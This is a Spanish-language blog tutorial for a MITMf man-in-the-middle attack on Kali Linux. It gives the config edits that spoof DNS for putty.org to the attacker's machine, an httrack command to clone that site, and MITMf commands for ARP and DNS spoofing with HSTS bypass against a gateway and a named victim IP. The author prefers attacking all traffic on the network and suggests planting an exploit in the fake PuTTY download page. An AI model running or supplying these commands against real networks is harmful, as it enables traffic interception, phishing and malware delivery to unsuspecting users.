Advertisement

header ads

ATAQUE DE MITMF CON CLONACIÓN DE WEB EN KALI LINUX

Seguimos con la serie de MITMF en Kali Linux en este caso vamos a clonar un sitio con el mismo procedimiento cuando use ARNET.


Este procedimiento es un fácil pero antes quiero que leas algunos post que he publicado:
HERE
HERE
HERE
Ahora vamos a configurar mitmf para la clonación de un sitio web.
Obviamente seguiremos usando el mismo comando:
nano /usr/share/mitmf/config/mitmf.conf
Ahora buscamos con CONTROL + w = nameserver y agregamos lo siguiente:
                [[[A]]]     # Queries for IPv4 address records
                *.thesprawl.org=192.168.178.27
                #twitter*.twitter.com=192.168.1.8 ## Kali LAN address
                *.putty.org=192.168.1.8 ## Kali LAN address
Ahora vamos a clonar un sitio web:
httrack http://www.putty.org/ -O "/var/www/html/" -%v -r1
En caso de no ejecutar apache2 puedes usar el siguiente comando
python3 -m http.server 80
Agregamos el sitio web=la IP de tu ordenando o donde esta el sitio.
Obviamente este procedimiento se hace dentro de la red y en caso de buscar un objetivo tenes herramientas como arp-scan o netdiscover.
Y ahora ejecutamos MITMF
mitmf --spoof --arp --dns --hsts --gateway 192.168.1.1 -i wlan0
mitmf --spoof --arp --dns --hsts --gateway 192.168.1.1 --target 192.168.1.2 -i wlan0
Obviamente he agregado target y target es la IP de la victima pero prefiero atacar a todo el trafico y enfocarme en todos.
Funciona hasta en el movil como observas en la captura de imagen la parte donde tenia que decir DOWNLOAD putty dice Download Cread

Ahora si cada vez que ingrese la víctima ingresara con un mensaje de la web que ingresara o puedes usar como putty modificas y agregar un exploit en modificar la pagina.
Espero haberte ayudado y GRACIAS!
No te olvides en compartirlo para seguir con la serie MITMF

Publicar un comentario

0 Comentarios